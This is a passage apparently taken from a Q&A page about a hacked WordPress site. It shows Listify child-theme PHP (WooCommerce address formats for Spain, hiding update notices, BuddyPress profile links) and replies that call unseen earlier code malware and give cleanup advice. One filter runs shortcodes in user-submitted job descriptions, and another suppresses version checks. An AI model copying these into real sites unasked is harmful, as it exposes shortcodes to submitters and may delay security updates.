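	// Nothing to rewrite when no Spanish format was supplied; previously this
	// overwrote 'ES' with an empty string in that case.
	if ( ! isset( $formats['ES'] ) ) {
		return $formats;
	}
	$formats['ES'] = str_replace( '{state}', '{administrative_area_level_2}', $formats['ES'] );
	return $formats;
}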
// Priority 90: runs after custom_address_formats (20) so it sees the final ES format.
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats_shim', 90 );
/**
 * Make addresses work for Spain (Andalusia): replace WooCommerce's ES address
 * format with one that prints the province instead of the state.
 *
 * @param array $formats Country code => address format map.
 * @return array `$formats` with the ES entry replaced.
 */
function custom_address_formats( $formats ) {
	$lines = array(
		'{address_1}',
		'{address_2}',
		'{postcode} - {city}',
		'{administrative_area_level_2} (Spain)',
	);
	$formats['ES'] = implode( "\n", $lines );
	return $formats;
}
// Priority 20: replaces the ES format before custom_address_formats_shim (90) runs.
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats', 20 );
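/**
 * Hide WordPress core/plugin update notifications from users who cannot act on them.
 *
 * Only users lacking the `update_plugins` capability are affected, so
 * administrators still see and can run updates. Note that this condition is
 * also true for anonymous visitors, so the init hook below fires on most
 * requests; removing wp_version_check there may delay core update checks —
 * confirm against the WordPress version in use.
 */
global $user_login;
// wp_get_current_user() replaces the deprecated get_currentuserinfo(); it populates
// the same user globals, which is the only effect the old call had here.
wp_get_current_user();
if ( ! current_user_can( 'update_plugins' ) ) {
	// Closures replace create_function(), which is removed in PHP 8 (and was eval() underneath).
	add_action(
		'init',
		function () {
			remove_action( 'init', 'wp_version_check' );
		},
		2
	);
	add_filter( 'pre_option_update_core', function () {
		return null;
	} );
}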
////////////////////////////////////////////////////////////////////////
// BuddyPress Profile URL Integration //////////////////////////////////
////////////////////////////////////////////////////////////////////////
// Point wpDiscuz commenter links at the BuddyPress profile when BuddyPress is active.
add_filter('wpdiscuz_profile_url', 'wpdiscuz_bp_profile_url', 10, 2);
/**
 * Use the BuddyPress member page as a commenter's profile URL.
 *
 * @param string      $profile_url URL wpDiscuz would use by default.
 * @param object|null $user        Commenting user (needs an `ID`), or null for guests.
 * @return string The BuddyPress member URL, or `$profile_url` when there is no user or no BuddyPress.
 */
function wpdiscuz_bp_profile_url( $profile_url, $user ) {
	if ( ! $user || ! class_exists( 'BuddyPress' ) ) {
		return $profile_url;
	}
	return bp_core_get_user_domain( $user->ID );
}
// Remove WooCommerce's "WooThemes updater" admin notice.
remove_action( 'admin_notices', 'woothemes_updater_notice' );
// Enable shortcodes in job/listing descriptions. Descriptions are submitted by
// listing authors, so every shortcode registered on the site becomes callable
// from that user-supplied text — review which shortcodes front-end submitters
// should be able to reach.
add_filter( 'the_job_description', 'do_shortcode' );
- 1 Download the theme again and replace the files. But if you've been hacked, it is possible that other things happened to your website as well - it is best to consult an expert that will help you through this – kero Commented Nov 12, 2018 at 14:14
Everything before this is malware:
<?php
/**
* Listify child theme.
*/
Delete everything before that, including the ?> in front of it.
Keep in mind that if someone got access to add this code, then they could have done a lot more. Follow all the steps in the Codex: https://codex.wordpress.org/FAQ_My_site_was_hacked